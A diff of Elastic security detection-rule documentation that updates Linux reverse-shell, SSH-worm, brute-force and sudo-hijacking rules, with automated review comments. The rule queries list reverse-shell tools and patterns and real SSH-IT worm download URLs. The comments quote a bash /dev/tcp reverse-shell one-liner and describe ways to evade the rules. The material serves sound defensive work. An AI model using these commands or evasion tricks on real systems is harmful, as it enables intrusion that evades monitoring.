b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-java.asciidoc index 15a75e0162..48f5db331c 100644 
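Review bot: the new `*/dev/tcp/itom-vault/*` entry in potential-reverse-shell-activity-via-terminal extends a list of deployment-specific host names (`sirh_db`, `remoteiot.com`, `elk.stag.one`, `kafka`) hard-coded into a prebuilt rule as command-line exclusions. The destination in `bash -i >& /dev/tcp/<host>/<port>` is an attacker-chosen string: point one of these names at a listener via `/etc/hosts` or DNS (`/dev/tcp/kafka/4444`) and the rule goes quiet. Exclusions tied to one environment belong in per-deployment rule exceptions; if they must stay in the shared rule, scope them on `process.parent.executable` or `user.name`, which the attacker does not control, rather than on the destination substring.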
--- a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-java.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-java.asciidoc @@ -31,7 +31,7 @@ This detection rule identifies the execution of a Linux shell process from a Jav * Tactic: Execution * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -46,12 +46,14 @@ This detection rule identifies the execution of a Linux shell process from a Jav [source, js] ---------------------------------- sequence by host.id with maxspan=5s -[ network where host.os.type == "linux" and event.action in ("connection_accepted", "connection_attempted") and - process.executable : ("/usr/bin/java", "/bin/java", "/usr/lib/jvm/*", "/usr/java/*") and - destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1" ] by process.entity_id -[ process where host.os.type == "linux" and event.action == "exec" and - process.parent.executable : ("/usr/bin/java", "/bin/java", "/usr/lib/jvm/*", "/usr/java/*") and - process.parent.args : "-jar" and process.executable : "*sh" ] by process.parent.entity_id + [network where host.os.type == "linux" and event.action in ("connection_accepted", "connection_attempted") and + process.executable : ("/usr/bin/java", "/bin/java", "/usr/lib/jvm/*", "/usr/java/*") and + destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1" + ] by process.entity_id + [process where host.os.type == "linux" and event.action == "exec" and + process.parent.executable : ("/usr/bin/java", "/bin/java", "/usr/lib/jvm/*", "/usr/java/*") and + process.parent.args : "-jar" and process.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") + ] by process.parent.entity_id ---------------------------------- 
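Review bot: the potential-reverse-shell-via-java query still requires `process.parent.args : "-jar"`, so shells spawned by JVMs launched through a classpath (`-cp`/`-classpath` plus a main class, which is how `catalina.sh`, Jetty and most application-server wrappers start) never match the second step; either drop the `-jar` constraint or document that the rule only covers executable-jar launches. The explicit shell list in this hunk also includes `ash`, while potential-reverse-shell and potential-reverse-shell-via-suspicious-child-process in the same patch use the list without it; reuse one list across the Linux shell rules.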
diff --git a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-suspicious-binary.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-suspicious-binary.asciidoc index 18cba2e95c..73d5f2ee96 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-suspicious-binary.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-suspicious-binary.asciidoc @@ -31,7 +31,7 @@ This detection rule detects the creation of a shell through a chain consisting o * Tactic: Execution * Data Source: Elastic Defend -*Version*: 4 +*Version*: 5 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-suspicious-child-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-suspicious-child-process.asciidoc index 94a8528325..54b6ce7100 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-suspicious-child-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-suspicious-child-process.asciidoc @@ -31,7 +31,7 @@ This detection rule detects the creation of a shell through a suspicious process * Tactic: Execution * Data Source: Elastic Defend -*Version*: 4 +*Version*: 5 *Rule authors*: 
@@ -46,20 +46,30 @@ This detection rule detects the creation of a shell through a suspicious process [source, js] ---------------------------------- sequence by host.id, process.entity_id with maxspan=1s -[ process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( - (process.name : "python*" and process.args : "-c") or - (process.name : "php*" and process.args : "-r") or - (process.name : "perl" and process.args : "-e") or - (process.name : "ruby" and process.args : ("-e", "-rsocket")) or - (process.name : "lua*" and process.args : "-e") or - (process.name : "openssl" and process.args : "-connect") or - (process.name : ("nc", "ncat", "netcat") and process.args_count >= 3) or - (process.name : "telnet" and process.args_count >= 3) or - (process.name : "awk")) and - process.parent.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") ] -[ network where host.os.type == "linux" and event.type == "start" and event.action in ("connection_attempted", "connection_accepted") and - process.name : ("python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk") and - destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1" ] + [process where host.os.type == "linux" and event.type == "start" and event.action in ("exec", "fork") and ( + (process.name : "python*" and process.args : "-c" and process.args : ( + "*import*pty*spawn*", "*import*subprocess*call*" + )) or + (process.name : "perl*" and process.args : "-e" and process.args : "*socket*" and process.args : ( + "*exec*", "*system*" + )) or + (process.name : "ruby*" and process.args : ("-e", "-rsocket") and process.args : ( + "*TCPSocket.new*", "*TCPSocket.open*" + )) or + (process.name : "lua*" and process.args : "-e" and process.args : "*socket.tcp*" and process.args : ( + "*io.popen*", "*os.execute*" + )) or + (process.name : "php*" and process.args : "-r" and process.args : "*fsockopen*" and process.args : 
"*/bin/*sh*") or + (process.name : ("awk", "gawk", "mawk", "nawk") and process.args : "*/inet/tcp/*") or + (process.name : "openssl" and process.args : "-connect") or + (process.name : ("nc", "ncat", "netcat") and process.args_count >= 3 and not process.args == "-z") or + (process.name : "telnet" and process.args_count >= 3) + ) and process.parent.name : ( + "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "python*", "php*", "perl", "ruby", "lua*", + "openssl", "nc", "netcat", "ncat", "telnet", "awk")] + [network where host.os.type == "linux" and event.type == "start" and event.action in ("connection_attempted", "connection_accepted") and + process.name : ("python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk") and + destination.ip != null and not cidrmatch(destination.ip, "127.0.0.0/8", "169.254.0.0/16", "224.0.0.0/4", "::1")] ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-udp.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-udp.asciidoc index 6d4b03a308..7734d9ccff 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-udp.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell-via-udp.asciidoc @@ -26,11 +26,12 @@ This detection rule identifies suspicious network traffic patterns associated wi *Tags*: +* Domain: Endpoint * OS: Linux * Use Case: Threat Detection * Tactic: Execution -*Version*: 1 +*Version*: 2 *Rule authors*: 
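Review bot: the two steps of the potential-reverse-shell-via-suspicious-child-process sequence are joined on `host.id, process.entity_id` but use different name filters. The exec step now accepts `perl*`, `ruby*` and `gawk`/`mawk`/`nawk`, while the network step still lists only `perl`, `ruby` and `awk`, so a reverse shell started as `perl5.34`, `ruby3.1` or `gawk` passes the first step and is dropped at the second, and the sequence can never complete for those names. Align the network filter with the process filter, or remove the name filter from the second step altogether, since the join on `process.entity_id` already ties it to the same process.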
@@ -39,27 +40,6 @@ This detection rule identifies suspicious network traffic patterns associated wi *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -## Setup -This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. -``` -Kibana --> -Management --> -Integrations --> -Auditd Manager --> -Add Auditd Manager -``` -`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the "audit rules" configuration box or the "auditd rule files" box by specifying a file to read the audit rules from. -``` -For this detection rule no additional audit rules are required to be added to the integration. -``` -Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. ----------------------------------- - ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell.asciidoc index 79a905532d..625e56ab46 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-reverse-shell.asciidoc 
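Review bot: the guide removed from potential-reverse-shell-via-udp was the only text stating that the rule depends on the `auditd_manager` integration, and the tag hunk in this file adds `Domain: Endpoint` without any `Data Source` tag, so after this change the page never says which integration produces the events. Add a `Data Source` tag (or a one-line setup note) so readers know what to deploy.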
@@ -31,7 +31,7 @@ This detection rule identifies suspicious network traffic patterns associated wi * Tactic: Execution * Data Source: Elastic Defend -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -46,12 +46,13 @@ This detection rule identifies suspicious network traffic patterns associated wi [source, js] ---------------------------------- sequence by host.id with maxspan=1s -[ network where host.os.type == "linux" and event.type == "start" and event.action in ("connection_attempted", "connection_accepted") and - process.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "socat") and - destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1" ] by process.entity_id -[ process where host.os.type == "linux" and event.type == "start" and event.action : ("exec", "fork") and - process.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and - process.parent.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "socat") ] by process.parent.entity_id + [network where host.os.type == "linux" and event.type == "start" and event.action in ("connection_attempted", "connection_accepted") and + process.name : ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "socat") and + destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1"] by process.entity_id + [process where host.os.type == "linux" and event.type == "start" and event.action in ("exec", "fork") and + process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and + process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "socat") and not + process.args : "*imunify360-agent*"] by process.parent.entity_id ---------------------------------- 
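Review bot: the new `not process.args : "*imunify360-agent*"` clause in potential-reverse-shell exempts any shell whose arguments contain that substring anywhere, and the child's arguments are chosen by whoever launches it; a shell started as `bash -c '... # imunify360-agent'` is suppressed. If the false positive is the Imunify360 agent spawning shells, exclude on its `process.parent.executable` path, which an attacker on the box does not control, rather than on a substring of the child's arguments.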
diff --git a/docs/detections/prebuilt-rules/rule-details/potential-secure-file-deletion-via-sdelete-utility.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-secure-file-deletion-via-sdelete-utility.asciidoc index 1a01c4f4f1..278a83d1a0 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-secure-file-deletion-via-sdelete-utility.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-secure-file-deletion-via-sdelete-utility.asciidoc @@ -30,11 +30,12 @@ Detects file name patterns generated by the use of Sysinternals SDelete utility * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Impact * Data Source: Elastic Endgame * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -105,3 +106,11 @@ file where host.os.type == "windows" and event.type == "change" and file.name : ** Name: File Deletion ** ID: T1070.004 ** Reference URL: https://attack.mitre.org/techniques/T1070/004/ +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-shadow-file-read-via-command-line-utilities.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-shadow-file-read-via-command-line-utilities.asciidoc index c0fa2d0dda..245f813e72 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-shadow-file-read-via-command-line-utilities.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-shadow-file-read-via-command-line-utilities.asciidoc @@ -34,7 +34,7 @@ Identifies access to the /etc/shadow file via the commandline using standard sys * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/potential-shell-via-wildcard-injection-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-shell-via-wildcard-injection-detected.asciidoc index a4d20bd4df..f65f2ec4b7 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-shell-via-wildcard-injection-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-shell-via-wildcard-injection-detected.asciidoc @@ -32,7 +32,7 @@ This rule monitors for the execution of a set of linux binaries, that are potent * Tactic: Execution * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-ssh-it-ssh-worm-downloaded.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-ssh-it-ssh-worm-downloaded.asciidoc new file mode 100644 index 0000000000..c4cdc2b936 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-ssh-it-ssh-worm-downloaded.asciidoc 
@@ -0,0 +1,78 @@ +[[potential-ssh-it-ssh-worm-downloaded]] +=== Potential SSH-IT SSH Worm Downloaded + +Identifies processes that are capable of downloading files with command line arguments containing URLs to SSH-IT's autonomous SSH worm. This worm intercepts outgoing SSH connections every time a user uses ssh. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.thc.org/ssh-it/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Defend +* Data Source: Elastic Endgame + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name in ("curl", "wget") and process.args : ( + "https://thc.org/ssh-it/x", "http://nossl.segfault.net/ssh-it-deploy.sh", "https://gsocket.io/x", + "https://thc.org/ssh-it/bs", "http://nossl.segfault.net/bs" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SSH +** ID: T1021.004 +** Reference URL: https://attack.mitre.org/techniques/T1021/004/ +* Technique: +** Name: Remote Service Session Hijacking +** ID: T1563 +** Reference URL: https://attack.mitre.org/techniques/T1563/ +* Sub-technique: +** Name: SSH Hijacking +** ID: T1563.001 +** Reference URL: 
https://attack.mitre.org/techniques/T1563/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-successful-linux-ftp-brute-force-attack-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-successful-linux-ftp-brute-force-attack-detected.asciidoc index c15b239d8e..b746db6f51 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-successful-linux-ftp-brute-force-attack-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-successful-linux-ftp-brute-force-attack-detected.asciidoc @@ -29,7 +29,7 @@ An FTP (file transfer protocol) brute force attack is a method where an attacker * Use Case: Threat Detection * Tactic: Credential Access -*Version*: 2 +*Version*: 3 *Rule authors*: 
@@ -38,41 +38,6 @@ An FTP (file transfer protocol) brute force attack is a method where an attacker *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -### Auditbeat Setup -Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. - -#### The following steps should be executed in order to add the Auditbeat for Linux System: -- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. -- To install the APT and YUM repositories follow the setup instructions in this {security-guide}/beats/auditbeat/current/setup-repositories.html[helper guide]. -- To run Auditbeat on Docker follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-docker.html[helper guide]. -- To run Auditbeat on Kubernetes follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. -- For complete Setup and Run Auditbeat information refer to the {security-guide}/beats/auditbeat/current/setting-up-and-running.html[helper guide]. - -### Auditd Manager Integration Setup -The Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel. -Auditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. 
- -#### The following steps should be executed in order to add the Elastic Agent System integration "auditd_manager" on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Auditd Manager and select the integration to see more details about it. -- Click Add Auditd Manager. -- Configure the integration name and optionally add a description. -- Review optional and advanced settings accordingly. -- Add the newly installed `auditd manager` to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. -- Click Save and Continue. -- For more details on the integeration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager). - -#### Rule Specific Setup Note -Auditd Manager subscribes to the kernel and receives events as they occur without any additional configuration. -However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the "audit rules" configuration box or the "auditd rule files" box by specifying a file to read the audit rules from. -- For this detection rule no additional audit rules are required to be added to the integration. ----------------------------------- - ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/potential-successful-linux-rdp-brute-force-attack-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-successful-linux-rdp-brute-force-attack-detected.asciidoc index fcbf25a5aa..93774f6658 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-successful-linux-rdp-brute-force-attack-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-successful-linux-rdp-brute-force-attack-detected.asciidoc 
@@ -29,7 +29,7 @@ An RDP (Remote Desktop Protocol) brute force attack involves an attacker repeate * Use Case: Threat Detection * Tactic: Credential Access -*Version*: 2 +*Version*: 3 *Rule authors*: 
@@ -38,41 +38,6 @@ An RDP (Remote Desktop Protocol) brute force attack involves an attacker repeate *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -### Auditbeat Setup -Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. - -#### The following steps should be executed in order to add the Auditbeat for Linux System: -- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. -- To install the APT and YUM repositories follow the setup instructions in this {security-guide}/beats/auditbeat/current/setup-repositories.html[helper guide]. -- To run Auditbeat on Docker follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-docker.html[helper guide]. -- To run Auditbeat on Kubernetes follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. -- For complete Setup and Run Auditbeat information refer to the {security-guide}/beats/auditbeat/current/setting-up-and-running.html[helper guide]. - -### Auditd Manager Integration Setup -The Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel. -Auditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. 
- -#### The following steps should be executed in order to add the Elastic Agent System integration "auditd_manager" on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Auditd Manager and select the integration to see more details about it. -- Click Add Auditd Manager. -- Configure the integration name and optionally add a description. -- Review optional and advanced settings accordingly. -- Add the newly installed `auditd manager` to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. -- Click Save and Continue. -- For more details on the integeration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager). - -#### Rule Specific Setup Note -Auditd Manager subscribes to the kernel and receives events as they occur without any additional configuration. -However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the "audit rules" configuration box or the "auditd rule files" box by specifying a file to read the audit rules from. -- For this detection rule no additional audit rules are required to be added to the integration. ----------------------------------- - ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/potential-successful-ssh-brute-force-attack.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-successful-ssh-brute-force-attack.asciidoc index 07d59866b5..fdd3fb4a0f 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-successful-ssh-brute-force-attack.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-successful-ssh-brute-force-attack.asciidoc @@ -29,7 +29,7 @@ Identifies multiple SSH login failures followed by a successful one from the sam * Use Case: Threat Detection * Tactic: Credential Access -*Version*: 7 +*Version*: 8 *Rule authors*: 
@@ -80,7 +80,7 @@ The rule identifies consecutive SSH login failures followed by a successful logi [source, js] ---------------------------------- -sequence by host.id, source.ip, user.name with maxspan=3s +sequence by host.id, source.ip, user.name with maxspan=15s [authentication where host.os.type == "linux" and event.action in ("ssh_login", "user_login") and event.outcome == "failure" and source.ip != null and source.ip != "0.0.0.0" and source.ip != "::" ] with runs=10 diff --git a/docs/detections/prebuilt-rules/rule-details/potential-sudo-hijacking-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-sudo-hijacking-detected.asciidoc index 5ce17a9e7b..cdc82c937b 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-sudo-hijacking-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-sudo-hijacking-detected.asciidoc @@ -3,7 +3,7 @@ Identifies the creation of a sudo binary located at /usr/bin/sudo. Attackers may hijack the default sudo binary and replace it with a custom binary or script that can read the user's password in clear text to escalate privileges or enable persistence onto the system every time the sudo binary is executed. -*Rule type*: eql +*Rule type*: new_terms *Rule indices*: @@ -34,7 +34,7 @@ Identifies the creation of a sudo binary located at /usr/bin/sudo. Attackers may * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 2 +*Version*: 103 *Rule authors*: @@ -48,7 +48,8 @@ Identifies the creation of a sudo binary located at /usr/bin/sudo. Attackers may [source, js] ---------------------------------- -file where event.type in ("creation", "file_create_event") and file.path == "/usr/bin/sudo" +host.os.type:linux and event.category:file and event.type:("creation" or "file_create_event") and +file.path:("/usr/bin/sudo" or "/bin/sudo") and not process.name:(docker or dockerd) ---------------------------------- 
diff --git a/docs/detections/prebuilt-rules/rule-details/potential-sudo-privilege-escalation-via-cve-2019-14287.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-sudo-privilege-escalation-via-cve-2019-14287.asciidoc index fd5de28c25..99f2b3f921 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-sudo-privilege-escalation-via-cve-2019-14287.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-sudo-privilege-escalation-via-cve-2019-14287.asciidoc @@ -32,7 +32,7 @@ This rule monitors for the execution of a suspicious sudo command that is levera * Data Source: Elastic Defend * Use Case: Vulnerability -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-sudo-token-manipulation-via-process-injection.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-sudo-token-manipulation-via-process-injection.asciidoc index 3519f4f3a3..ed709f569b 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-sudo-token-manipulation-via-process-injection.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-sudo-token-manipulation-via-process-injection.asciidoc @@ -31,7 +31,7 @@ This rule detects potential sudo token manipulation attacks through process inje * Tactic: Privilege Escalation * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-suspicious-debugfs-root-device-access.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-suspicious-debugfs-root-device-access.asciidoc index 8e560d1cec..79a4ec6a4e 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-suspicious-debugfs-root-device-access.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-suspicious-debugfs-root-device-access.asciidoc 
@@ -33,7 +33,7 @@ This rule monitors for the usage of the built-in Linux DebugFS utility to access * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-suspicious-file-edit.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-suspicious-file-edit.asciidoc index 0c252ba61f..c9613a9f22 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-suspicious-file-edit.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-suspicious-file-edit.asciidoc @@ -18,7 +18,7 @@ This rule monitors for the potential edit of a suspicious file. In Linux, when e *Searches indices from*: now-119m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) -*Maximum alerts per execution*: 100 +*Maximum alerts per execution*: 1 *References*: None @@ -33,7 +33,7 @@ This rule monitors for the potential edit of a suspicious file. In Linux, when e * Rule Type: BBR * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: 
@@ -52,9 +52,9 @@ file.path : ( /* common interesting files and locations */ "/etc/.shadow.swp", "/etc/.shadow-.swp", "/etc/.shadow~.swp", "/etc/.gshadow.swp", "/etc/.gshadow-.swp", "/etc/.passwd.swp", "/etc/.pwd.db.swp", "/etc/.master.passwd.swp", "/etc/.spwd.db.swp", "/etc/security/.opasswd.swp", - "/etc/.hosts.swp", "/etc/.environment.swp", "/etc/.profile.swp", "/etc/sudoers.d/.*.swp", - "/etc/ld.so.conf.d/.*.swp", "/etc/init.d/.*.swp", "/etc/.rc.local.swp", "/etc/rc*.d/.*.swp", - "/dev/shm/.*.swp", "/etc/update-motd.d/.*.swp", "/usr/lib/update-notifier/.*.swp", + "/etc/.environment.swp", "/etc/.profile.swp", "/etc/sudoers.d/.*.swp", "/etc/ld.so.conf.d/.*.swp", + "/etc/init.d/.*.swp", "/etc/.rc.local.swp", "/etc/rc*.d/.*.swp", "/dev/shm/.*.swp", "/etc/update-motd.d/.*.swp", + "/usr/lib/update-notifier/.*.swp", /* service, timer, want, socket and lock files */ "/etc/systemd/system/.*.swp", "/usr/local/lib/systemd/system/.*.swp", "/lib/systemd/system/.*.swp", diff --git a/docs/detections/prebuilt-rules/rule-details/potential-syn-based-network-scan-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-syn-based-network-scan-detected.asciidoc index 9b06d734ef..ba0a4b2d30 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-syn-based-network-scan-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-syn-based-network-scan-detected.asciidoc @@ -21,7 +21,7 @@ This rule identifies a potential SYN-Based port scan. A SYN port scan is a techn *Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) -*Maximum alerts per execution*: 100 +*Maximum alerts per execution*: 5 *References*: None @@ -32,7 +32,7 @@ This rule identifies a potential SYN-Based port scan. A SYN port scan is a techn * Tactic: Reconnaissance * Use Case: Network Security Monitoring -*Version*: 3 +*Version*: 4 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/potential-unauthorized-access-via-wildcard-injection-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-unauthorized-access-via-wildcard-injection-detected.asciidoc index 797694334e..5fd8d87492 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-unauthorized-access-via-wildcard-injection-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-unauthorized-access-via-wildcard-injection-detected.asciidoc @@ -34,7 +34,7 @@ This rule monitors for the execution of the "chown" and "chmod" commands with co * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-upgrade-of-non-interactive-shell.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-upgrade-of-non-interactive-shell.asciidoc new file mode 100644 index 0000000000..28b516b863 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-upgrade-of-non-interactive-shell.asciidoc 
